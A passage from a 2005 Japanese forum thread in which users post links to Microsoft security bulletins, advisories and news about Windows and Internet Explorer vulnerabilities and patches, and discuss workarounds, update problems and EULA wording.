938キタ━━━━━━(゚∀゚)━━━━━━ !!!!! :2005/06/15(水) 08:41:12
【緊急】
MS05-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (883939)
http://go.microsoft.com/?linkid=3305271
【緊急】
MS05-026 - HTML ヘルプの脆弱性により、リモートでコードが実行される (896358)
http://go.microsoft.com/?linkid=3305272
【緊急】
MS05-027 - サーバー メッセージ ブロックの脆弱性により、リモートでコードが実行される (896422)
http://go.microsoft.com/?linkid=3305273
【重要】
MS05-028 - WebClient サービスの脆弱性により、リモートでコードが実行される (896426)
http://go.microsoft.com/?linkid=3305274
【重要】
MS05-29 - Exchange Server 5.5 の Outlook Web Access の脆弱性により、クロスサイト スクリプティング攻撃が行われる (895179)
http://go.microsoft.com/?linkid=3305275
【重要】
MS05-030 - Outlook Express 用の累積的なセキュリティ更新プログラム (897715)
http://go.microsoft.com/?linkid=3305276
【重要】
MS05-031 - ステップ バイ ステップの対話型トレーニングの脆弱性により、リモートでコードが実行される (898458)
http://go.microsoft.com/?linkid=3305277
【警告】
MS05-032 - Microsoft エージェントの脆弱性により、なりすましが行われる (890046)
http://go.microsoft.com/?linkid=3305278
【警告】
MS05-033 - Telnet クライアントの脆弱性により、情報漏えいが起こる (896428)
http://go.microsoft.com/?linkid=3305279
【警告】
MS05-034 - ISA Server 2000 用の累積的なセキュリティ更新プログラム (899753)
http://go.microsoft.com/?linkid=3305280
939名無しさん@お腹いっぱい。:2005/06/15(水) 08:43:19
マイクロソフト セキュリティ情報 MS02-035 更新
公開日: 2002/07/11
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305567
マイクロソフト セキュリティ情報 MS05-004 更新
公開日: 2005/02/09
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305576
マイクロソフト セキュリティ情報 MS05-019 更新
公開日: 2005/04/13
更新日: 2005/06/15
http://go.microsoft.com/?linkid=3305585
940名無しさん@お腹いっぱい。:2005/06/15(水) 08:53:50
関連スレ(Win板)。人柱報告なども下記参照。
Windows updateしたときに上げるスレ 20
http://pc8.2ch.net/test/read.cgi/win/1113469880/l50
Windows Update失敗したらageるスレ 8
http://pc8.2ch.net/test/read.cgi/win/1115080461/l50
941名無しさん@お腹いっぱい。:2005/06/15(水) 10:57:03
WindowsやIEに複数の危険なセキュリティ・ホール,パッチの適用が急務
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162727/
4月に公開されたWindowsのパッチが再リリース,ネットワーク接続に関する問題を解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050615/162734/
942名無しさん@お腹いっぱい。:2005/06/19(日) 15:26:22
【PC診断士】
http://pc.ai2you.com/PCshindanshi/index.asp
※無料のIDを作成する必要があります。

@ブラウザの安全度を無料診断できます。
ノートン入れてるのにセキュリティは中の下でした。
ぶっちゃけ参考になりません。誰がやっても同じ結果(低い結果)になるんじゃないの??
みんなも試してみよう!

APCのクリーン度をチェックする。
こちらの方が人気ありますね。

ウホッ!結果よろしく。
943名無しさん@お腹いっぱい。:2005/06/19(日) 18:26:26
>>942
IEでActiveXを許可する時点で何でもできる環境与えているのに
安全度調査も何もないだろ。
前提条件が駄目すぎる。

クリーン度調査も、ネットでやるなよ。
レジストリからドライブの中身の調査だろ
怖くて、俺にはできん。
944名無しさん@お腹いっぱい。:2005/06/19(日) 19:00:38
>>943
おっしゃるとおりで・・・w
945名無しさん@お腹いっぱい。:2005/06/19(日) 19:09:52
えらく登録情報詳しく聞いてくんのね
946名無しさん@お腹いっぱい。:2005/06/19(日) 19:11:28
ですね。
もっぱら僕は架空の氏名・住所の捨てIDですが。
947名無しさん@お腹いっぱい。:2005/06/20(月) 22:20:46
「Outlook Express」に存在する複数不具合を修正するWindows XP SP2用パッチ
http://www.forest.impress.co.jp/article/2005/06/20/oebugfix.html
948名無しさん@お腹いっぱい。:2005/06/21(火) 10:07:24
マイクロソフト,Windows Updateの新版v6への移行を明らかに
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050620/4/
>クライアントPCの移行は自動的で,移行期間中または,移行期間後にユーザーがWindows Updateサイトへアクセスした際に,
>Windows Update v6用クライアント・プログラムの導入プロセスが行われるという(該当サイトhttp://support.microsoft.com/default.aspx?scid=kb;ja;899789)。
>「自動更新」機能を有効にしている場合は,自動的に切り替わるという。
949名無しさん@お腹いっぱい。:2005/06/21(火) 23:24:28
IEやFirefox,Operaなどにダイアログ・ボックスの発行元を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050621/163100/

次スレの案出してくだされ。>ALL
950名無しさん@お腹いっぱい。:2005/06/21(火) 23:26:13
>>949
>Operaは最新版の8.01では修正されている。他のブラウザは,6月21日時点でパッチは提供されていない。
ふ〜ン。
952名無しさん@お腹いっぱい。:2005/06/27(月) 10:25:18
米Microsoft,IEのぜい弱性を認めるものの対策パッチは提供せず
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20050627/2/
>同社によれば,この欠陥は実際にはバグではなく,仕様の1つであり,それはIEがWeb標準に従っているからだという。
>「これは現在の標準的なWebブラウザの機能がフィッシング攻撃に使えるという1つの例だ」と同社はある声明文で指摘した。
おいおい。
953名無しさん@お腹いっぱい。:2005/06/27(月) 15:30:06
マイクロソフト セキュリティ アドバイザリ (902333)
元の場所が表示されないブラウザ ウィンドウがフィッシング詐欺に利用される可能性について 公開日: 2005年6月21日
http://www.microsoft.com/japan/technet/security/advisory/902333.mspx
954名無しさん@お腹いっぱい。:2005/06/28(火) 01:35:07
トップダウン方式をやめないかぎり技術の進歩とセキュリティは相反するものの
ように見えるかもしれない。アクセスしようとするところに鍵を懸けず、
そこへ行く道を塞いでいる。私達の行く手を制限している。
新しい技術は、そこへ行く新しい道を作り出す。
955名無しさん@お腹いっぱい。:2005/06/28(火) 11:45:26
「Outlook Expressのセキュリティ・ホールへの攻撃コードが出現」――米CERT/CC
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050627/163391/
956名無しさん@お腹いっぱい。:2005/06/29(水) 09:56:55
■Windows 2000 SP4 用の更新プログラム ロールアップ 1
http://www.microsoft.com/downloads/details.aspx?FamilyID=c0a2ca36-1179-431c-80e6-60a494d3823d&DisplayLang=ja
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
Windows 2000 SP4 のロールアップ 1 を更新します。(機械翻訳)
http://support.microsoft.com/kb/891861
>この更新ロールアップは、 Windows 2000 SP4 のリリースと2005年4月30日の間の Windows 2000 で生成されたセキュリティ関連更新の一覧です。
なので、Windows 2000 SP4 + RP1に2005年5月と6月のアップデートを適用する必要がある。

■Windows XP 用の更新プログラム (KB898461)
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=50c334e1-9a67-4b99-a65a-069b79267856
認証が必要だが、現在のところ認証をパスしてもダウンロードできる。
ソフトウェアの更新 898461 がバージョン 6.1.22.4 の パッケージ インストーラの Windows の固定コピーをインストールします。(機械翻訳)
http://support.microsoft.com/kb/898461
957名無しさん@お腹いっぱい。:2005/06/30(木) 15:10:57
最近outbound方向でsvchostが変なリクエストしだすと思ったら
どうも自動更新がMS以外にもつなごうとするらしい
(無効にするとMBSA1.2から「リスク大」判定しやがるんでめんどーだから通知だけさせとく設定にしてたのよ)
WMP10もフルモードのまま起動するといろんな(音楽配信系?)とこにつなごうとするし
これ新しい流行なのかな?
958名無しさん@お腹いっぱい。:2005/07/01(金) 20:41:46
豪セキュリティ企業がIEの問題を指摘、Microsoftも「調査を進めている」
http://internet.watch.impress.co.jp/cda/news/2005/07/01/8252.html
>オーストラリアのセキュリティベンダーであるSEC Consultは6月29日、Internet Explorer(IE)に
>ヒープオーバーフローが発生する恐れがあると警告した。これを受けて米Microsoftは30日、Security
>Advisory(903144)として調査を進めていることを公表した。
959名無しさん@お腹いっぱい。:2005/07/04(月) 17:52:11
IEのパッチ未公開セキュリティ・ホールを突くコードが出現,パソコンを乗っ取られる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050704/163905/
960名無しさん@お腹いっぱい。:2005/07/08(金) 19:34:40
マイクロソフト セキュリティ アドバイザリ (903144)
COM オブジェクト (Javaprxy.dll) により、Internet Explorer が異常終了する
http://www.microsoft.com/japan/technet/security/advisory/903144.mspx
回避策
Javaprxy.dll COM オブジェクトを無効にして Internet Explorer で実行されないようにする
Microsoft Windows 2000 Service Pack 3 上の Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 上の Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 または Microsoft Windows XP Service Pack 1 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows XP Service Pack 2 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=C1381768-6C6D-4568-97B1-600DB8798EBF
つづく
961名無しさん@お腹いっぱい。:2005/07/08(金) 19:35:07
つづき
Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=F368E231-9918-4881-9F17-60312F82183F
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)、Microsoft Windows Server 2003 for Itanium-based Systems、および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=D785F9AB-DBE9-4272-A87E-64205690F98E
Microsoft Windows Server 2003 x64 Edition および Microsoft Windows XP Professional x64 Edition 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=68209225-A682-4008-A22B-881C401486F7
Microsoft Windows Millennium Edition 上の Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=06F8CD1B-93A0-4522-AF7D-603DD5C2BACB
Microsoft Windows 98、Microsoft Windows 98 SE、または Microsoft Windows Millennium Edition 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
962名無しさん@お腹いっぱい。:2005/07/10(日) 13:43:38
7月度の月例パッチ、“緊急”は3件〜Microsoftが事前告知
http://internet.watch.impress.co.jp/cda/news/2005/07/08/8334.html
963名無しさん@お腹いっぱい。:2005/07/12(火) 16:12:55
Eのコンポーネントを使うアプリケーションにセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050712/164449/
964963:2005/07/12(火) 16:14:22
誤:Eの
正:IEの
スマソ逝ってくる…
965名無しさん@お腹いっぱい。:2005/07/13(水) 08:31:56
【新規 最大深刻度: 緊急】
Microsoft Word の脆弱性により、リモートでコードが実行される (903672) (MS05-035)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-035.mspx
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-036.mspx
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-037.mspx
【更新 最大深刻度: 警告】
Telnet クライアントの脆弱性により、情報漏えいが起こる (896428) (MS05-033)
http://www.microsoft.com/japan/technet/security/bulletin/MS05-033.mspx
>Services for UNIX 2.0 および Services for UNIX 2.1 用のセキュリティ
>更新プログラムが利用可能であることをお知らせし、「セキュリティ更新
>プログラムに関する情報」に追加のセキュリティ更新プログラムに関する
>更新情報を掲載しました。
966名無しさん@お腹いっぱい。:2005/07/13(水) 17:20:57
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
のパッチって結局kill bit立てるだけだよね↓と何が違うんだろ
http://internet.watch.impress.co.jp/cda/news/2005/07/06/8295.html


と思ってたら自己解決w
http://internet.watch.impress.co.jp/cda/news/2005/07/13/8391.html
>この脆弱性はマイクロソフトの「Security Advisory」において「903144」として公表されていた。
>マイクロソフトでは「903144」公表時に、問題となっていた「Javaprxy.dll COMオブジェクト」(Javaprxy.dll)を無効化するプログラムを配布しており、
>このプログラムを適用しているユーザーは、今回の修正パッチを適用する必要はないという。
967966:2005/07/13(水) 17:36:45
>966だから漏れjavaprxy.dllする回避策してるからMS05-037はしばらくスルーでいいや
(近いうちにMSJVMアンインストールするつもりだしw)

マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
だけ当ててこうとインストーラ実行したら

-----------------------------------------------

注 : Microsoft Corporation またはお客様の所在
地に応じては、その子会社 (以下総称して「マイクロ
ソフト」といいます) がお客様に本追加ソフトウェア
を許諾するものとします。お客様は、本追加ソフトウ
ェアと共に使用することを指定された Microsoft
Windows ソフトウェア (以下「本ソフトウェア」と
いいます) の正規に許諾された各コピーと共に、この
追加ソフトウェアを使用することができます。お客様
が本ソフトウェアの許諾を受けていない場合、本追加
ソフトウェアを使用することはできません。お客様に
よる本追加ソフトウェアの使用は、本ソフトウェアに
付属する使用許諾契約書に拘束されるものとします。


EULAID:HFX_RM.0_GDR_NRL_JA

------------------------------------------
エッ!!!!!これだけ?うそーん_| ̄|○ マッマサカ (順不同)

パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ ええ
けど何同意してるかわかったもんじゃない
つーかこんなの有効なの?
968名無しさん@お腹いっぱい。:2005/07/13(水) 18:42:47
まさか「情報の送信を了承する」とでも書いてあるんじゃないだろうな?とか思えてくる

http://www.itmedia.co.jp/enterprise/articles/0507/13/news025.html

けれどなんか危なそうな穴だし・・・こんな時に怪しい(ように思えるライセンス改定する)の勘弁してくれよ>MS

もしもOS自体に変な動きされたらPFWなんぞあてになるわけもない
漏れはできないんでパッチ当てた(or当てられる)香具師誰かPC外でパケット監視おながい
969名無しさん@お腹いっぱい。:2005/07/13(水) 20:51:40
>MicrosoftWindows ソフトウェア (以下「本ソフトウェア」といいます)
(ry
>お客様による本追加ソフトウェアの使用は、本ソフトウェアに
>付属する使用許諾契約書に拘束されるものとします。

本追加ソフトウェア=このパッチ?
本ソフトウェア=元のWindows?

結局元々のEULAそのまま(今までと同じ)ということでいい?

ナンカヤヤコシイ
970名無しさん@お腹いっぱい。:2005/07/13(水) 23:46:54
>>966
日本のセキュリティチームの Blog
http://www.exconn.net/Blogs/team02/archive/2005/07/13/1393.aspx
>更新プログラム自体は、アドバイザリで公開していた killbits 処理を行うものと同じものです。
971名無しさん@お腹いっぱい。:2005/07/14(木) 18:48:46
マイクロソフト、アップデータを一括提供する「Microsoft Update」
http://pc.watch.impress.co.jp/docs/2005/0714/ms.htm
972Windows 2000 SP4 UR1関連:2005/07/19(火) 09:47:40
Windows 2000 SP4 対応の更新プログラム ロールアップ 1 (KB891861) の適用後に Excel や Word でフロッピーディスクにアクセスすると応答を停止する場合がある
http://support.microsoft.com/default.aspx?scid=kb;ja;904130&sd=rss&spid=1743
Windows Update や Microsoft Update サイトにアクセスすると 0x800700C1 エラーが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;904392
Windows 2000 Service Pack 4 対応の更新プログラム ロールアップ 1 を適用すると Outlook からパスワード変更が出来なくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;904753
973名無しさん@お腹いっぱい。:2005/07/19(火) 14:14:54
既にあちこちで知られているが、
Windowsに強制終了されるセキュリティ・ホール,リモートデスクトップのユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050719/164837/
Microsoft Security Advisory (904797)
Vulnerability in Remote Desktop Protocol (RDP) Could Lead to Denial of Service
http://www.microsoft.com/technet/security/advisory/904797.mspx
974名無しさん@お腹いっぱい。:2005/07/20(水) 16:42:14
>>973
上記の日本語アドバイザリ
マイクロソフト セキュリティ アドバイザリ (904797)
リモート デスクトップ プロトコル (RDP) の脆弱性によりサービス拒否が発生する
http://www.microsoft.com/japan/technet/security/advisory/904797.mspx
http://www.microsoft.com/japan/technet/security/advisory/default.mspx
975名無しさん@お腹いっぱい。:2005/07/25(月) 11:47:53
「IEのJPEG画像処理にセキュリティ・ホール」――米SANS Instituteが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050725/165214/
976名無しさん@お腹いっぱい。:2005/08/03(水) 23:12:48
●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●

ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html

●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
977名無しさん@お腹いっぱい。:2005/08/05(金) 11:00:46
「8月公開のセキュリティ情報は計6件,最大深刻度は『緊急』」――MSが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050805/165940/
http://www.microsoft.com/technet/security/bulletin/advance.mspx
978名無しさん@お腹いっぱい。
ICMPの問題を修正するWindows XP SP2用パッチがダウンロードセンターで公開
http://www.forest.impress.co.jp/article/2005/08/08/icmppatch.html
ダウンロードの詳細 : Windows XP 用の更新プログラム (KB889527)
http://www.microsoft.com/downloads/details.aspx?FamilyID=cd0931a8-1f22-4613-93fe-8785bdcc3394&DisplayLang=ja
Windows XP Professional Service Pack 2-based コンピュータで(ICMP パケットを)許可するように Windows ファイアウォール機能を構成したにもかかわらず、 ICMP パケットが廃棄されます。
http://support.microsoft.com/kb/889527/ja

要WGA認証、要再起動。
いまのところ対象としてWindows XP Professional SP2だけがあがっている。